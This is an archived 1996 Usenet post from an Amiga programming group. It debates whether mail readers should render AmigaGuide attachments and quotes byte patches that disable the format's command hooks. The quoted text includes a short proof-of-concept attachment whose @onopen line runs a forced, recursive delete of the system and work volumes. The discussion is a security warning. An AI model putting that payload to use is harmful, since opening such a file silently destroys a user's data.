home *** CD-ROM | disk | FTP | other *** search
/ NetNews Offline 2 / NetNews Offline Volume 2.iso / news / comp / sys / amiga / programmer / 1054 < prev    next >
Encoding:
Text File  |  1996-08-05  |  2.4 KB  |  78 lines

  1. Path: news.mountain.net!usenet
  2. From: gene_heskett@wvlink.mpl.com (Gene Heskett)
  3. Newsgroups: comp.sys.amiga.programmer,comp.sys.amiga.networking
  4. Subject: Re: Best Mail Program for use with SLIP, SMTP, POP, AmiTCP?
  5. Date: 14 Jan 96 23:23:38 +0500
  6. Organization: MountainNet, Inc. Morgantown WV 800.444.1458
  7. Message-ID: <1941.6587T1403T1902@wvlink.mpl.com>
  8. References: <54422@babylon.pfm-mainz.de>
  9. NNTP-Posting-Host: slip4.mpl.com
  10. X-Newsreader: THOR 2.22 (Amiga;TCP/IP)
  11.  
  12.  RB> Jim Cooper wrote:
  13.  
  14. >> Datatypes.
  15. >>
  16. >> If you send an AmigaGuide file as an EMail attachment, it
  17. >> will show up in the Voodoo window *as* AmigaGuide - with
  18. >> clickable buttons, etc!
  19.  
  20. Ralph Babel replies:
  21.  
  22.  RB> Good grief!
  23.  
  24.  RB> What if someone received the following AmigaGuide attachment?
  25.  
  26.  RB>   @database
  27.  RB>   @onopen "'address command ''delete sys:#? work:#? all quiet force'''"
  28.  RB>   @node main
  29.  RB>   @endnode
  30.  
  31.  RB> The following patches ...
  32.  
  33.  RB>   - amigaguide.library 34.11 (9.8.93), 62932 bytes:
  34.  
  35.  RB>     $7C88: $51 => $70
  36.  RB>     $7C89: $4F => $00
  37.  RB>     $7C8A: $48 => $4E
  38.  RB>     $7C8B: $E7 => $75
  39.  RB>     $8EDB: $AE => $71
  40.  RB>     $8EDC: $FF => $4E
  41.  RB>     $8EDD: $22 => $71
  42.  
  43.  RB>   - amigaguide.datatype 40.12 (23.8.93), 51104 bytes:
  44.  
  45.  RB>     $5DDC: $48 => $70
  46.  RB>     $5DDD: $E7 => $00
  47.  RB>     $5DDE: $01 => $4E
  48.  RB>     $5DDF: $3E => $75
  49.  RB>     $6B77: $AE => $71
  50.  RB>     $6B78: $FF => $4E
  51.  RB>     $6B79: $22 => $71
  52.  RB>     $AB08: $67 => $60
  53.  
  54.  RB> ... will disable onopen, onclose, rx, rxs, and system.
  55.  
  56. Which is all well and no doubt nice Ralph, BUT!  It breaks probably 90% of
  57. the software written in .guide format. :-(
  58.  
  59. Methinks the filtering of such skullduggery needs to be a bit more specific
  60. than just turning amigaguide into a lister with buttons that don't work!
  61.  
  62. Anybody who jumped on this one, I hope you have backup copies, or kept the
  63. script so you can reverse patch them when you find out the buttons often
  64. don't work as they once did.
  65.  
  66. Don't take me wrong Ralph, some sort of a firewall does need to be erected
  67. there in actual fact, particularly now that its been called to someones
  68. attention.  Murphy is alive and well!
  69.  
  70. Just my $.02 worth
  71.  
  72. /*            Gene Heskett          |  These opinions are NOT to be  */
  73. /*  CE @ WDTV Weston/Clarksburg WV  |  confused with the official    */
  74. /*  <gene_heskett@wvlink.mpl.com>   |  WDTV managment views          */
  75. #include <std.disclaimer>
  76.  
  77.  
  78.